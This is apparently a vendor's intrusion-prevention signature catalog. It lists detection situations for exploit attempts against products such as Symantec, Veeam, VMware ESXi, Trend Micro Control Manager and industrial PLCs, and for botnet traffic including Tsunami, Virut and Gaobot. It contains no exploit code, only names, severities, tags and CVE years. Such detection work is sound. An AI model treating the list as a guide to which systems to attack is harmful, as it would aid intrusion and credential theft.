Tags: Any Operating System, Any Hardware, Symantec Antivirus Corporate Edition, Symantec Quarantine Server, Symantec Systems Center, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1351-5242
Vulnerability: Symantec-Alert-Management-System-Pin-Number-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Symantec-Altiris-DS-SQL-Injection

About this situation: An attempt to exploit a Symantec Altiris DS SQL Injection vulnerability detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows 2003, Any Hardware, Symantec Altiris Deployment Solution, CVE2008, Windows 2003 not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-803-5242
Vulnerability: Symantec-Altiris-DS-SQL-Injection
Description:
Back to top

Generic_CS-Symantec-AntiVirus-Intel-Alert-Handler-Service-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in Symantec's Antivirus Intel Alert Handler service detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Antivirus Corporate Edition, Symantec Client Security, Symantec System Center, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-368-4219
Last changed: sgpkg-ips-368-4219
Vulnerability: Symantec-AntiVirus-Intel-Alert-Handler-Service-Denial-Of-Service
Description:
Back to top

Generic_CS-Symantec-Multiple-Products-Vrtsweb-Code-Execution

About this situation: An attempt to a exploit a vulnerability in Symantec Veritas backup detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Veritas Software NetBackup, Veritas Software BackUp Exec, Symantec Backup Exec for Windows Server, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-289-4219
Last changed: sgpkg-ips-533-5211
Vulnerability: Symantec-Multiple-Products-Vrtsweb-Code-Execution
Description:
Back to top

Generic_CS-Symantec-pcAnywhere-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec pcAnywhere detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Symantec pcAnywhere, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-723-5211
Vulnerability: Symantec-pcAnywhere-Buffer-Overflow
Description:
Back to top

Generic_CS-Symantec-Veritas-Enterprise-Administrator-Vxsvc-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Veritas Dynamic Multi-Pathing (DMP) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veritas Software NetBackup, Symantec Veritas Storage Foundation, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: Symantec-Veritas-Enterprise-Administrator-Vxsvc-Buffer-Overflow
Description:
Back to top

Generic_CS-Synergy-Clipboard-Integer-Overflow

About this situation: Detected an attempt to exploit an integer overflow vulnerability in Synergy screen sharing application
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Synergy, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-514-5211
Vulnerability: Synergy-Clipboard-Integer-Overflow
Description:
Back to top

Generic_CS-System-Management-Homepage-Command-Injection

About this situation: An attempt to exploit a vulnerability in HP System Management Homepage (SMH) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP System Management Homepage, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: HP-System-Management-Homepage-Command-Injection
Description:
Back to top

Generic_CS-Tarantool-Xrow_Header_Decode-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Tarantool Tarantool detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Tarantool, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-853-5242
Vulnerability: Tarantool-Xrow_Header_Decode-Out-Of-Bounds-Read
Description:
Back to top

Generic_CS-TeamViewer-Client-Startup

About this situation: TeamViewer remote control software usage detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, TeamViewer, Any Operating System not specific, Remote Control, TCP Client Traffic
First detected in: sgpkg-ips-275-4219
Last changed: sgpkg-ips-275-4219
Vulnerability: TeamViewer-Usage
Description:
Back to top

Generic_CS-Timbuktu-Pro-Directory-Traversal

About this situation: An attempt to exploit a Timbuktu Pro Directory Traversal vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Timbuktu Pro, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-737-5211
Vulnerability: Timbuktu-Pro-Directory-Traversal
Description:
Back to top

Generic_CS-TinyIdentD-2.2-Stack-Buffer-Overflow

About this situation: TinyIdentD 2.2 Stack Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, TinyIdentD, CVE2007, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: TinyIdentD-2.2-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Trace-Mode-UDP-Denial-Of-Service-2

About this situation: A vulnerability in Trace Mode allowing denial of service.
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Trace Mode, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Trace-Mode-UDP-Denial-Of-Service-2
Description:
Back to top

Generic_CS-Trend-Micro-Control-Manager-Cmdhandlerlicensemanager-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-970-5242
Vulnerability: Trend-Micro-Control-Manager-Cmdhandlerlicensemanager-SQL-Injection
Description:
Back to top

Generic_CS-Trend-Micro-Control-Manager-cmdHandlerStatusMonitor-SQL-Injection

About this situation: A Trend Micro Control Manager cmdHandlerStatusMonitor SQL Injection vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Vulnerability: Trend-Micro-Control-Manager-cmdHandlerStatusMonitor-SQL-Injection
Description:
Back to top

Generic_CS-Trend-Micro-Control-Manager-Cmdhandlertvcscommander-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Vulnerability: Trend-Micro-Control-Manager-Cmdhandlertvcscommander-SQL-Injection
Description:
Back to top

Generic_CS-Trend-Micro-Control-Manager-Cmdprocessor-Addtask-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-438-4219
Vulnerability: Trend-Micro-Control-Manager-Cmdprocessor.exe-Addtask-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Trend Micro OfficeScan Corporate Edition detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan Corporate Edition, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow
Description:
Back to top

Generic_CS-Tri-PLC-Crafted-Packet-Denial-Of-Service

About this situation: A vulnerability in Tri-PLC Nano-10 r81 allowing denial of service.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Nano-10, Any Hardware, Nano-10 PLC, CVE2013, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Tri-PLC-Crafted-Packet-Denial-Of-Service
Description:
Back to top

Generic_CS-Tri-PLC-Nano-10-r81-Denial-Of-Service

About this situation: A vulnerability in Tri-PLC Nano-10 r81 allowing denial of service.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Nano-10, Any Hardware, Nano-10 PLC, CVE2013, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Tri-PLC-Nano-10-r81-Denial-Of-Service
Description:
Back to top

Generic_CS-Tsunami-Linux-Trojan-Infection-Traffic

About this situation: Tsunami Linux trojan infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1498-5242
Vulnerability: Tsunami-Linux-Trojan-Infection-Traffic
Description:
Back to top

Generic_CS-UltraVNC-File-Transfer-Request-Handler-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in UltraVNC Project UltraVNC detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, UltraVNC, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1151-5242
Vulnerability: UltraVNC-File-Transfer-Request-Handler-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-UltraVNC-VNC-Server-File-Transfer-Offer-Handler-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in UltraVNC Project UltraVNC detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, UltraVNC, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Vulnerability: UltraVNC-VNC-Server-File-Transfer-Offer-Handler-Heap-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-Unisys-Business-Information-Server-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Unisys Business Information Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Unisys Business Information Server, CVE2009, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-498-5211
Vulnerability: Unisys-Business-Information-Server-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Unitrends-UEB-bpserverd-Authentication-Bypass

About this situation: A Unitrends UEB bpserverd Authentication Bypass vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Unitrends, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1345-5242
Vulnerability: Unitrends-UEB-bpserverd-Authentication-Bypass
Description:
Back to top

Generic_CS-Unix-Commands-Over-Plain-TCP

About this situation: Unix commands sent over a plaintext connection
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1088-5242
Description:
Back to top

Generic_CS-Unix-System-Monitor-Messages

About this situation: Unix system monitor output messages detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-660-5211
Vulnerability: Unix-System-Monitor-Messages
Description:
Back to top

Generic_CS-UnrealIRCD-Backdoor-Command-Execution

About this situation: An attempt to exploit a UnrealIRCD Backdoor Command Execution vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, UnrealIRCD, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: UnrealIRCD-Backdoor-Command-Execution
Description:
Back to top

Generic_CS-Valmet-DNA-Predictable-Key-Usage

About this situation: Valmet DNA TCP traffic using a predictable encryption key detected
Context: TCP Client Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, CVE2021, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Vulnerability: Valmet-DNA-Predictable-Key-Remote-Code-Execution
Description:
Back to top

Generic_CS-Veeam-Backup-And-Replication-Authentication-Bypass-CVE-2022-26501

About this situation: An attempt to exploit a vulnerability in Veeam Backup and Replication detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veeam Backup and Replication, CVE2022, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1460-5242
Last changed: sgpkg-ips-1460-5242
Vulnerability: Veeam-Backup-And-Replication-Authentication-Bypass-CVE-2022-26501
Description:
Back to top

Generic_CS-Veeam-Backup-And-Replication-CDbCryptoKeyInfo-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Veeam Backup and Replication detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veeam Backup and Replication, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1855-5242
Last changed: sgpkg-ips-1855-5242
Vulnerability: Veeam-Backup-And-Replication-CDbCryptoKeyInfo-Insecure-Deserialization
Description:
Back to top

Generic_CS-Veeam-Backup-And-Replication-Cproxybinaryformatter-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Veeam Backup and Replication detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veeam Backup and Replication, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1854-5242
Vulnerability: Veeam-Backup-And-Replication-Cproxybinaryformatter-Arbitrary-File-Deletion
Description:
Back to top

Generic_CS-Veeam-Backup-And-Replication-Credential-Disclosure-CVE-2023-27532

About this situation: An attempt to exploit a vulnerability in Veeam Backup and Replication detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veeam Backup and Replication, CVE2023, Any Operating System not specific, Suspected Disclosure, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1571-5242
Last changed: sgpkg-ips-1807-5242
Vulnerability: Veeam-Backup-And-Replication-Credential-Disclosure-CVE-2023-27532
Description:
Back to top

Generic_CS-Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2024-40711

About this situation: An attempt to exploit a vulnerability in Veeam Backup and Replication detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veeam Backup and Replication, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1855-5242
Vulnerability: Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2024-40711
Description:
Back to top

Generic_CS-Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2025-23120

About this situation: An attempt to exploit a vulnerability in Veeam Backup and Replication detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veeam Backup and Replication, CVE2025, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Vulnerability: Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2025-23120
Description:
Back to top

Generic_CS-Veeam-One-Agent-Deserialization

About this situation: An attempt to exploit a vulnerability in Veeam ONE detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Veeam ONE, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Veeam-One-Agent-Deserialization
Description:
Back to top

Generic_CS-Veritas-Backup-Exec-Agent-Error-Status-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in VERITAS Software BackUp Exec detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Veritas Software BackUp Exec, CVE2005, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-729-5211
Vulnerability: Veritas-Backup-Exec-Agent-Error-Status-Denial-Of-Service
Description:
Back to top

Generic_CS-Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877

About this situation: An attempt to exploit a vulnerability in Veritas Software NetBackup detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veritas Software NetBackup, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877
Veritas-Backup-Exec-Agent-Improper-File-Access-Vulnerability-CVE-2021-27876
Veritas-Backup-Exec-Agent-Command-Execution-Vulnerability-CVE-2021-27878
Description:
Back to top

Generic_CS-Veritas-NetBackup-Remote-Command-Execution

About this situation: An attempt to exploit a Veritas NetBackup Remote Command Execution vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veritas Software NetBackup, CVE2004, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1761-5242
Vulnerability: Veritas-NetBackup-Remote-Command-Execution
Description:
Back to top

Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow

About this situation: Detects buffer overflow exploits against VERITAS NetBackup voluma manager daemon
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Veritas Software NetBackup, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-1761-5242
Vulnerability: Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow
Description:
Back to top

Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow-2

About this situation: Detects buffer overflow exploits against VERITAS NetBackup voluma manager daemon
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Veritas Software NetBackup, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-674-5211
Vulnerability: Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow
Description:
Back to top

Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Token-Buffer-Overflow

About this situation: Detects buffer overflow exploits against VERITAS NetBackup volume manager daemon
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Veritas Software NetBackup, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Symantec-Veritas-NetBackup-Volume-Manager-Daemon-Token-Buffer-Overflow
Description:
Back to top

Generic_CS-Vipa-Controls-Winplc7-Recv-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in VIPA Controls WinPLC7 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, VIPA Controls WinPLC7, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-867-5242
Vulnerability: Vipa-Controls-Winplc7-Recv-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-Virut-Malware-C2-Traffic

About this situation: Virut malware C2 traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Virut-Malware-C2-Traffic
Description:
Back to top

Generic_CS-VMware-Authorization-Service-User-Credential-Parsing-DOS

About this situation: VMware Authorization Service User Credential Parsing Denial of Service
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC VMware Workstation, EMC VMware Player, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-259-3038
Vulnerability: VMware-Authorization-Service-User-Credential-Parsing-DOS
Description:
Back to top

Generic_CS-VMware-Authorization-Service-User-Credential-Parsing-DOS-2

About this situation: VMware Authorization Service User Credential Parsing Denial of Service
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC VMware Workstation, EMC VMware Player, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-259-3038
Vulnerability: VMware-Authorization-Service-User-Credential-Parsing-DOS
Description:
Back to top

Generic_CS-VMware-ESXi-Remote-Code-Execution-CVE-2021-21974

About this situation: An attempt to exploit a vulnerability in VMware ESXi detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, VMware ESXi, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1553-5242
Last changed: sgpkg-ips-1553-5242
Vulnerability: VMware-ESXi-Remote-Code-Execution-CVE-2021-21974
Description:
Back to top

Generic_CS-VMware-Vcenter-Server-Authentication-Pointer-Out-of-Range-CVE-2023-20894

About this situation: An attempt to exploit a vulnerability in VMWare vCenter Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Cloud Foundation, VMware vCenter Server, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1658-5242
Vulnerability: VMware-Vcenter-Server-Authentication-Pointer-Out-of-Range-CVE-2023-20894
Description:
Back to top

Generic_CS-VMware-Vcenter-Server-Jmx-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in VMWare vCenter Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, VMware vCenter Server, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-699-5211
Vulnerability: VMware-Vcenter-Server-Jmx-Remote-Code-Execution
Description:
Back to top

Generic_CS-VMware-VNC-Vmwdynresolution-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in VMWare ESXi detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC VMware, CVE2017, Any Operating System not specific, EMC VMware not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1039-5242
Last changed: sgpkg-ips-1588-5242
Vulnerability: VMware-VNC-Vmwdynresolution-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Voltronic-Power-Viewpower-Getmodbuspassword-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Voltronic Power ViewPower detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Voltronic Power ViewPower Pro, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1701-5242
Last changed: sgpkg-ips-1701-5242
Vulnerability: Voltronic-Power-Viewpower-Getmodbuspassword-Information-Disclosure
Description:
Back to top

Generic_CS-Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Voltronic Power ViewPower Pro detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Voltronic Power ViewPower Pro, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection
Description:
Back to top

Generic_CS-Voltronic-Power-Viewpower-Pro-Selecteventconfig-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Voltronic Power ViewPower Pro detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Voltronic Power ViewPower Pro, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1694-5242
Last changed: sgpkg-ips-1694-5242
Vulnerability: Voltronic-Power-Viewpower-Pro-Selecteventconfig-SQL-Injection
Description:
Back to top

Generic_CS-Voltronic-Power-Viewpower-Pro-UpdateManagerPassword-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Voltronic ViewPower Pro detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Mac OS, Any Hardware, Voltronic Power ViewPower Pro, CVE2023, Windows not specific, Linux not specific, Mac OS not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1701-5242
Vulnerability: Voltronic-Power-Viewpower-Pro-UpdateManagerPassword-Authentication-Bypass
Description:
Back to top

Generic_CS-W32/Brepibot.gen-Activity

About this situation: W32/Brepibot.gen activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Brepibot.gen-Malware
Description:
Back to top

Generic_CS-W32/Gaobot.worm.gen.by-Activity

About this situation: W32/Gaobot.worm.gen.by activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
